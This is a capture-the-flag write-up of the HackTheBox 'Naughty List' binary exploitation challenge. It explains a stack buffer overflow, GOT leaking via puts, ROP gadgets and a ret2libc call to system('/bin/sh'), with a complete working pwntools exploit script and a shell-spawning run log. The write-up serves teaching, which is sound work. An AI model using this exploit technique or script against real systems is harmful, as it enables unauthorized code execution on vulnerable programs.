Learnings on Binary Exploitation (1): ret2libc

Last week, I solved some challenges in the Cyber Santa is Coming To Town CTF by HackTheBox. There, I spent some time on the pwn (binary exploitation) challenges and learned some new approaches that I’d like to share here.

Challenge

We are looking at the Naughty List challenge. We receive two files: naughty_list and libc.so.6. Upon running the binary and putting in some data, we get the following output (every letter is colored differently in the output, but I’d like to save you from that):

$ ./naughty_list

~ Ho Ho Ho Santa is here ~

       _______________
    0==( Naughty List (c==0
       '______________'|
         | Name        |
         | Gift        |
       __)_____________|
   0==(               (c==0
       '--------------'

[*] Enter your name    (letters only): Richard
[*] Enter your surname (letters only): Wohlbold
[*] Enter your age (18-120): 19

[+] Name:    [RICHARD]
[+] Surname: [WOHLBOLD]
[+] Age:     [19]

[*] Name of the gift you want and why you were good enough to deserve it: gift

[*] πŸŽ… will take a better look and hopefuly you will get your 🎁!

Next, we open the binary in Ghidra and see a function called get_descr that looks interesting:

We can also tell from Ghidra’s output that read can write too many bytes: The buffer can only store 32 bytes while read happily writes almost 1000. Since we have now located the memory error, we next need to find a way to exploit it.

We now inspect the security mechanisms of the binary:

$ pwn checksec ./naughty_list
[*] '/share/htb/pwn_naughty_list/naughty_list'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

This means that we cannot execute code from the stack (NX enabled), but we do not have to worry about stack canaries and the binary’s memory addresses are not randomized. Therefore, we have to jump to an already existing function that we want to execute.

We check the binary for a function like that but we find nothing so that we have to use a function from the C standard library which we can call. Therefore, we inspect the security of the provided libc.so.6:

$ pwn checksec ./libc.so.6    
[*] '/share/htb/pwn_minimelfistic/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

We see that PIE is enabled, so calling a C standard library function is not easy: We first need to locate the library in memory.

Linker internals

When a binary dynamically links to libc, it only places stubs of the functions that it uses into its own executable section. The section of these stubs is called the procedure linkage table (PLT). These stubs internally use the Global Offset Table (GOT) to get the addresses for the called functions. When a libc function is called for the first time, its address is calculated and placed into the GOT. Therefore, if we can manage to read a part of the GOT, we get a libc address in memory. Since we have libc.so.6 as a file, we can then subtract the address we got from the symbol location inside the library to get the base address of the library. After that, we can calculate the address for every function inside the library.

Reading the GOT

To read an address out of the Global Offset Table, we can only use the functions the binary has. Since the binary itself introduces no useful functions, we need to use a standard library function present in the PLT. We look at the standard library functions that are present:

$ nm -gj ./naughty_list 
alarm@@GLIBC_2.2.5
banner
__bss_start
check
color
color_arr
__data_start
data_start
display
_dl_relocate_static_pie
__dso_handle
_edata
_end
_fini
fwrite@@GLIBC_2.2.5
get_age
get_descr
get_name
get_surname
__gmon_start__
_init
_IO_stdin_used
__isoc99_scanf@@GLIBC_2.7
__libc_csu_fini
__libc_csu_init
__libc_start_main@@GLIBC_2.2.5
main
memset@@GLIBC_2.2.5
p
printf@@GLIBC_2.2.5
puts@@GLIBC_2.2.5
rainbow
rand@@GLIBC_2.2.5
read@@GLIBC_2.2.5
reset
setup
setvbuf@@GLIBC_2.2.5
srand@@GLIBC_2.2.5
_start
stdin@@GLIBC_2.2.5
stdout@@GLIBC_2.2.5
strcmp@@GLIBC_2.2.5
strlen@@GLIBC_2.2.5
time@@GLIBC_2.2.5
__TMC_END__
toupper@@GLIBC_2.2.5

One of the provided functions is puts. Looking at the manpage (man 3 puts), we see the following signature:

int puts(const char *s);

Since we are on 64 bit Linux (System V ABI), we need to put the buffer pointer in rdi before calling puts.

But how do we put the desired value into rdi? This is where so-called Return-Oriented Programming comes in.

Filling the register

Return-Oriented Programming is the practice of executing the last few instructions of functions and then jumping to the next function.

This is done by overwriting the stack, interleaving data with return addresses. The addresses are jumped to and the data is popped into the correct registers.

An address where it is useful for us is called a gadget. We can inspect a binary’s gadgets by running $ ROPgadget --binary ./naughty_list where we find the line 0x0000000000401443 : pop rdi ; ret. Therefore, the stack setup to read out a GOT address (buf) with puts is the following:

After puts, we would like to jump back to get_descr so we can exploit the buffer overflow again, this time knowing where libc is located, so we place the address of get_descr after the address of puts. Thus, we use the following payload (pwntools):

payload = b"A" * 40
payload += p64(0x401443) # pop rdi; ret
payload += p64(elf.got['puts'])
payload += p64(elf.symbols['puts'])
payload += p64(elf.symbols['get_descr'])

We then get the address of puts inside of libc. With the provided libc.so.6, we can calculate the base address by running libc.address = leaked_addr - libc.symbols['puts']. We find addresses which are aligned to page boundaries like 0x7f7d7f79e000 so we are confident that the script is working.

Now, we can calculate the address of system inside of libc. This function also takes one parameter:

int system(const char *command);

Therefore, we fill the register rdi with a pointer to /bin/sh\x00. This string can be found inside of libc. There was a problem of randomly getting an EOF on the server. After googling some time, I found out that this occurred due to stack misalignment in the call to system so I add a gadget that just returns. The final payload looks like this:

payload = b"A" * 40
payload += p64(0x401443) # pop rdi; ret
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(0x400756) # ret
payload += p64(libc.symbols['system'])

Running the script

We run the script and get the flag:

$ python3 solve.py
[*] '/share/htb/pwn_naughty_list/naughty_list'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/share/htb/pwn_naughty_list/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 178.62.5.61 on port 30661: Done
leaked puts 0x7fe2cf0e6aa0
leaked base 0x7fe2cf066000
[*] Switching to interactive mode
 
[*] πŸŽ… will take a better look and hopefuly you will get your 🎁!
$ ls
flag.txt  libc.so.6  naughty_list
$ cat flag.txt
HTB{u_w1ll_b3_n4ughtyf13d_1f_u_4r3_g3tt1ng_4_g1ft}
$ 
[*] Closed connection to 178.62.5.61 port 30661

The final script:

from pwn import *

local = True

elf = ELF('./naughty_list')
context.binary = elf
if local:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', 'c')
    p = gdb.debug('./naughty_list')
else:
    libc = ELF('./libc.so.6')
    p = remote('178.62.5.61', 30661)

p.recvuntil(b':')
p.recvuntil(b' ')
p.sendline(b'sh')
p.recvuntil(b':')
p.recvuntil(b' ')
p.sendline(b'abc')
p.recvuntil(b':')
p.recvuntil(b' ')
p.sendline(b'20')
p.recvuntil(b':')
p.recvuntil(b':')
p.recvuntil(b':')
p.recvuntil(b':')
p.recvuntil(b' ')

payload = b"A" * 40
payload += p64(0x401443) # pop rdi; ret
payload += p64(elf.got['puts'])
payload += p64(elf.symbols['puts'])
payload += p64(elf.symbols['get_descr'])
p.sendline(payload)
p.recvline()
p.recvline()
b = p.recvline()
leaked_puts = int.from_bytes(b.strip(), byteorder='little')
print("leaked puts", hex(leaked_puts))
libc.address = leaked_puts - libc.symbols['puts']
print("leaked base", hex(libc.address))
p.recvuntil(b':')

payload = b"A" * 40
payload += p64(0x401443) # pop rdi; ret
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(0x400756) # ret
payload += p64(libc.symbols['system'])
p.sendline(payload)
p.interactive()